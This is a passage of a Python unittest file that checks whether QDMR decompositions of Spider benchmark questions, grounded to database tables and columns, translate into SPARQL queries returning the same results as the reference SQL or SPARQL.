?cars_data_2 arc:cars_data:Accelerate ?Accelerate_1.
FILTER(?Accelerate_1 > ?Accelerate).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['horsepower of #REF', '#1']
# SUPERLATIVE['max', '#1', '#2']
# PROJECT['accelerate of #REF', '#1']
# PROJECT['accelerate of #REF', '#3']
# COMPARATIVE['#1', '#4', 'is higher than #5']
# AGGREGATE['count', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"horsepower of #REF")] = GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(2,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(3,0,"accelerate of #REF")] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(4,0,"accelerate of #REF")] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(5,2,"is higher than #5")] = GroundingKey.make_comparative_grounding(">", "#5")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev170(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 170
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country_name
WHERE
{
?countries arc:countries:CountryName ?country_name.
MINUS{
?car_makers arc:car_makers:Country ?car_maker_country.
?car_maker_country arc:car_makers:Country:countries:CountryId ?countries.
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# FILTER['#1', 'that had 8 cylinders']
# FILTER['#1', 'that were produced before 1980']
# UNION['#2', '#3']
# PROJECT['mpg of #REF', '#4']
# AGGREGATE['max', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,1,"that had 8 cylinders")] = GroundingKey.make_comparative_grounding("=", "8", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,1,"that were produced before 1980")] = GroundingKey.make_comparative_grounding("<", "1980", GroundingKey.make_column_grounding("cars_data", "Year"))
grounding[GroundingIndex(4,0,"mpg of #REF")] = GroundingKey.make_column_grounding("cars_data", "MPG")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev173(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 173
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country_name
WHERE
{
?countries arc:countries:CountryName ?country_name.
MINUS{
?car_makers arc:car_makers:Country ?car_maker_country.
?car_maker_country arc:car_makers:Country:countries:CountryId ?countries.
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# FILTER['#1', 'with car maker']
# DISCARD['#1', '#2']
# PROJECT['name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_table_grounding("countries")
grounding[GroundingIndex(1,1,"with car maker")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(3,0,"name of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev175(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 175
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT T1.Id , T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker
# GROUP BY T1.Id
# HAVING count(*) >= 2
# INTERSECT
# SELECT T1.Id , T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model
# GROUP BY T1.Id
# HAVING count(*) > 3
correct_sparql_query = textwrap.dedent("""\
SELECT ?car_makers ?Maker
WHERE
{
?car_makers arc:car_makers:Maker ?Maker.
{
SELECT ?Maker (count(?model_list) AS ?count)
WHERE
{
?car_makers_1 arc:car_makers:Maker ?Maker.
?Maker_2 arc:model_list:Maker:car_makers:Id ?car_makers_1.
?model_list arc:model_list:Maker ?Maker_2.
}
GROUP BY ?Maker
}
FILTER(?count >= 2).
{
SELECT ?Maker (count(?car_names) AS ?count_1)
WHERE
{
?car_makers_2 arc:car_makers:Maker ?Maker.
?Maker_4 arc:model_list:Maker:car_makers:Id ?car_makers_2.
?model_list_1 arc:model_list:Maker ?Maker_4.
?model_list_1 arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?Maker
}
FILTER(?count_1 > 3).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#9", "#8"]
# break_program:
# SELECT['car makers']
# PROJECT['the models that #REF produce', '#1']
# GROUP['count', '#2', '#1']
# COMPARATIVE['#1', '#3', 'is at least 2']
# PROJECT['the car makers that #REF produce', '#1']
# GROUP['count', '#5', '#1']
# COMPARATIVE['#1', '#6', 'is more than 3']
# INTERSECTION['#1', '#4', '#7']
# PROJECT['the ids of #REF', '#8']
# UNION['#9', '#8']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding[GroundingIndex(1,0,"the models that #REF produce")] = GroundingKey.make_table_grounding("model_list")
grounding[GroundingIndex(3,2,"is at least 2")] = GroundingKey.make_comparative_grounding(">=", "2")
grounding[GroundingIndex(4,0,"the car makers that #REF produce")] = GroundingKey.make_column_grounding("car_names", "MakeId")
grounding[GroundingIndex(6,2,"is more than 3")] = GroundingKey.make_comparative_grounding(">", "3")
grounding[GroundingIndex(8,0,"the ids of #REF")] = GroundingKey.make_column_grounding("car_makers", "Id")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev183(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 183
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: List all airline names and their abbreviations in "USA"
# SELECT Airline , Abbreviation FROM AIRLINES WHERE Country = "USA"
correct_sparql_query = textwrap.dedent("""\
SELECT ?Airline ?Abbreviation
WHERE
{
?airlines arc:airlines:Airline ?Airline.
?airlines arc:airlines:Abbreviation ?Abbreviation.
?airlines arc:airlines:Country ?Country.
FILTER(?Country = "USA")
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['airlines']
# PROJECT['names of #REF', '#1']
# PROJECT['abbreviations of #REF', '#2']
# UNION['#2', '#3']
# FILTER['#4', 'in USA']
grounding = {}
grounding[GroundingIndex(0,0,"airlines")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(2,0,"abbreviations of #REF")] = GroundingKey.make_column_grounding("airlines", "Abbreviation")
grounding[GroundingIndex(4,1,"in USA")] = GroundingKey.make_comparative_grounding("=", "USA", GroundingKey.make_column_grounding("airlines", "Country"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_switch_filter_to_comparative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 183
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: List all airline names and their abbreviations in "USA"
# SELECT Airline , Abbreviation FROM AIRLINES WHERE Country = "USA"
correct_sparql_query = textwrap.dedent("""\
SELECT ?Airline ?Abbreviation
WHERE
{
?airlines arc:airlines:Airline ?Airline.
?airlines arc:airlines:Abbreviation ?Abbreviation.
?airlines arc:airlines:Country ?Country.
FILTER(?Country = "USA")
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.ops[-1] = "comparative"
qdmr.args[-1] = ["#4", "#4", "in USA"]
# break_program:
# SELECT['airlines']
# PROJECT['names of #REF', '#1']
# PROJECT['abbreviations of #REF', '#2']
# UNION['#2', '#3']
# COMPARATIVE['#4', '#4','in USA']
grounding = {}
grounding[GroundingIndex(0,0,"airlines")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(2,0,"abbreviations of #REF")] = GroundingKey.make_column_grounding("airlines", "Abbreviation")
grounding[GroundingIndex(4,2,"in USA")] = GroundingKey.make_comparative_grounding("=", "USA", GroundingKey.make_column_grounding("airlines", "Country"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev237(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 237
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find all airlines that have flights from both airports 'APG' and 'CVO'.
# SQL:
# SELECT T1.Airline FROM AIRLINES AS T1 JOIN FLIGHTS AS T2 ON T1.uid = T2.Airline WHERE T2.SourceAirport = "APG"
# INTERSECT
# SELECT T1.Airline FROM AIRLINES AS T1 JOIN FLIGHTS AS T2 ON T1.uid = T2.Airline WHERE T2.SourceAirport = "CVO"
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['flights']
# #2: FILTER['#1', 'from the airport APG']
# #3: FILTER['#1', 'from the airport CVO']
# #4: PROJECT['airlines of #REF', '#1']
# #5: PROJECT['airlines of #REF', '#2']
# #6: PROJECT['airlines of #REF', '#3']
# #7: INTERSECTION['#4', '#5', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"flights")] = GroundingKey.make_table_grounding("flights")
grounding[GroundingIndex(1,1,"from the airport APG")] = GroundingKey.make_comparative_grounding("=", "APG", GroundingKey.make_column_grounding("flights", "SourceAirport"))
grounding[GroundingIndex(2,1,"from the airport CVO")] = GroundingKey.make_comparative_grounding("=", "CVO", GroundingKey.make_column_grounding("flights", "SourceAirport"))
grounding[GroundingIndex(3,0,"airlines of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(4,0,"airlines of #REF")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(5,0,"airlines of #REF")] = GroundingKey.make_table_grounding("airlines")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev261(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same, so there are multiple correct results
# SPARQL and SQL sort differently
# for the sake of this test, we will sort by ID instead
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Employee_ID ?Age.
}
ORDER BY ASC(?Age)""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[3] = ["#2", "#3"]
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# SORT['#2', '#3']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Employee_ID")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_non_deterministic_sort(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same, so there are multiple correct results
# SPARQL and SQL sort differently
# This should be dealt with in the metric
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Age ?Age.
}
ORDER BY ASC(?Age)""")
# correct_sparql_query = QueryToRdf(query=correct_sparql_query,
# output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name")),
# OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Age"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[3] = ["#2", "#3"]
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# SORT['#2', '#3']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True,
schema=schema)
self.assertTrue(equal, message)
# in this test, we have three people with the same age:
# ('Lee Mears', '29')
# ('Matt Stevens', '29')
# ('Tim Payne', '29')
# manually swap two confusable entries to ensure the test never passes accidentally
a_data = None
b_data = None
for i_ in range(len(result_correct.data)):
if result_correct.data[i_][0] == "Tim Payne":
a_data = i_
if result_correct.data[i_][0] == "Matt Stevens":
b_data = i_
self.assertTrue(a_data is not None and b_data is not None, "Something is wrong with the test, could not find entries to swap")
# swap and test again
result_correct.data[a_data], result_correct.data[b_data] = result_correct.data[b_data], result_correct.data[a_data]
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_sort_by_tuple(self):
"""Test an entry from spider dataset - modify to test sorting item w.r.t. several keys
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same
# SPARQL and SQL sort differently
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Age
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Age ?Age.
}
ORDER BY ASC(?Age) ASC(?Name)""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Age"))])
qdmr = QdmrInstance(["select", "project", "project", "union", "union", "sort"],
[["employees"],
['names of #REF', '#1'],
['ages of #REF', '#1'],
['#2', '#3'],
['#3', '#2'],
['#4', '#5']
])
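# The hand-built program outputs (name, age) in #4 and the reversed (age, name)
# in #5, so SORT['#4', '#5'] orders the rows by the (age, name) tuple -
# exercising sorting w.r.t. several keys.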
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# UNION['#2', '#3']
# UNION['#3', '#2']
# SORT['#4', '#5']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev266(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 266
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the cities that have more than one employee under age 30.
# SQL: select city from employee where age < 30 group by city having count(*) > 1
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cities']
# PROJECT['employees of #REF', '#1']
# PROJECT['ages of #REF', '#2']
# COMPARATIVE['#2', '#3', 'is under 30']
# GROUP['count', '#4', '#1']
# COMPARATIVE['#1', '#5', 'is more than one']
grounding = {}
grounding[GroundingIndex(0,0,"cities")] = GroundingKey.make_column_grounding("employee", "City")
grounding[GroundingIndex(1,0,"employees of #REF")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
grounding[GroundingIndex(3,2,"is under 30")] = GroundingKey.make_comparative_grounding("<", "30")
grounding[GroundingIndex(5,2,"is more than one")] = GroundingKey.make_comparative_grounding(">", "1")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev353(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 353
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT DISTINCT T1.template_type_description
# FROM Ref_template_types AS T1 JOIN Templates AS T2 ON T1.template_type_code = T2.template_type_code JOIN Documents AS T3 ON T2.Template_ID = T3.template_ID
# Question: What are the distinct template type descriptions for the templates ever used by any document?
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Template_Type_Description
WHERE
{
{
SELECT ?Templates
WHERE
{
?Template_ID arc:Documents:Template_ID:Templates:Template_ID ?Templates.
?Documents arc:Documents:Template_ID ?Template_ID.
}
GROUP BY ?Templates
}
?Templates arc:Templates:Template_Type_Code ?Template_Type_Code.
?Template_Type_Code arc:Templates:Template_Type_Code:Ref_Template_Types:Template_Type_Code ?Ref_Template_Types.
?Ref_Template_Types arc:Ref_Template_Types:Template_Type_Description ?Template_Type_Description.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['templates']
# FILTER['#1', 'used by any documents']
# PROJECT['type description of #REF', '#2']
# FILTER['#3', 'that are distinct']
grounding = {}
grounding[GroundingIndex(0,0,"templates")] = GroundingKey.make_table_grounding("Templates")
grounding[GroundingIndex(1,1,"used by any documents")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(2,0,"type description of #REF")] = GroundingKey.make_column_grounding("Ref_Template_Types", "Template_Type_Description")
grounding["distinct"] = ["#4"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev367(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 367
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show all document ids and the number of paragraphs in each document. Order by document id.
# SQL: SELECT document_id , count(*) FROM Paragraphs GROUP BY document_id ORDER BY document_id
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#5", "#2", "ASC"]
# break_program:
# #1: SELECT['documents']
# #2: PROJECT['document ids of #REF', '#1']
# #3: PROJECT['paragraphs of #REF', '#1']
# #4: GROUP['count', '#3', '#1']
# #5: UNION['#2', '#4']
# #6: SORT['#5', '#2', 'ASC']
grounding = {}
grounding[GroundingIndex(0,0,"documents")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(1,0,"document ids of #REF")] = GroundingKey.make_column_grounding("Paragraphs", "Document_ID")
grounding[GroundingIndex(2,0,"paragraphs of #REF")] = GroundingKey.make_table_grounding("Paragraphs")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev414(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 414
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT name , Level_of_membership FROM visitor WHERE Level_of_membership > 4 ORDER BY age DESC
# Question: Find the name and membership level of the visitors whose membership level is higher than 4, and sort by their age from old to young.
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Level_of_membership
WHERE
{
?visitor arc:visitor:Level_of_membership ?Level_of_membership.
FILTER(?Level_of_membership > 4).
?visitor arc:visitor:Name ?Name.
?visitor arc:visitor:Age ?Age.
}
ORDER BY DESC(?Age)""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#7", "#6", "from old to young"]
# break_program:
# SELECT['visitors']
# PROJECT['membership levels of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 4']
# PROJECT['names of #REF', '#3']
# PROJECT['membership levels of #REF', '#3']
# PROJECT['ages of #REF', '#3']
# UNION['#4', '#5']
# SORT['#7', '#6', 'from old to young']
grounding = {}
grounding[GroundingIndex(0,0,"visitors")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(1,0,"membership levels of #REF")] = GroundingKey.make_column_grounding("visitor", "Level_of_membership")
grounding[GroundingIndex(2,2,"is higher than 4")] = GroundingKey.make_comparative_grounding(">", "4")
grounding[GroundingIndex(3,0,"names of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
grounding[GroundingIndex(4,0,"membership levels of #REF")] = GroundingKey.make_column_grounding("visitor", "Level_of_membership")
grounding[GroundingIndex(5,0,"ages of #REF")] = GroundingKey.make_column_grounding("visitor", "Age")
grounding[GroundingIndex(7,2,"from old to young")] = GroundingKey.make_sortdir_grounding(ascending=False)
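# 'from old to young' grounds to a descending sort direction, matching the
# ORDER BY DESC(?Age) in the reference query above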
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev426(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
{
SELECT ?visitor
WHERE
{
{
SELECT ?visitor
WHERE
{
?visitor_ID arc:visit:visitor_ID:visitor:ID ?visitor.
?visit arc:visit:visitor_ID ?visitor_ID.
?visit arc:visit:Museum_ID ?Museum_ID.
?Museum_ID arc:visit:Museum_ID:museum:Museum_ID ?museum.
?museum arc:museum:Open_Year ?Open_Year.
FILTER(?Open_Year < "2009").
}
GROUP BY ?visitor
}
?visitor_ID_1 arc:visit:visitor_ID:visitor:ID ?visitor.
?visit_1 arc:visit:visitor_ID ?visitor_ID_1.
?visit_1 arc:visit:Museum_ID ?Museum_ID_1.
?Museum_ID_1 arc:visit:Museum_ID:museum:Museum_ID ?museum_1.
?museum_1 arc:museum:Open_Year ?Open_Year_1.
FILTER(?Open_Year_1 > "2011").
}
GROUP BY ?visitor
}
?visitor arc:visitor:Name ?Name.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['museums']
# #2: FILTER['#1', 'that opened before 2009']
# #3: FILTER['#1', 'that opened after 2011']
# #4: PROJECT['the visitor of #REF', '#1']
# #5: INTERSECTION['#4', '#2', '#3']
# #6: PROJECT['name of #REF', '#5']
grounding = {}
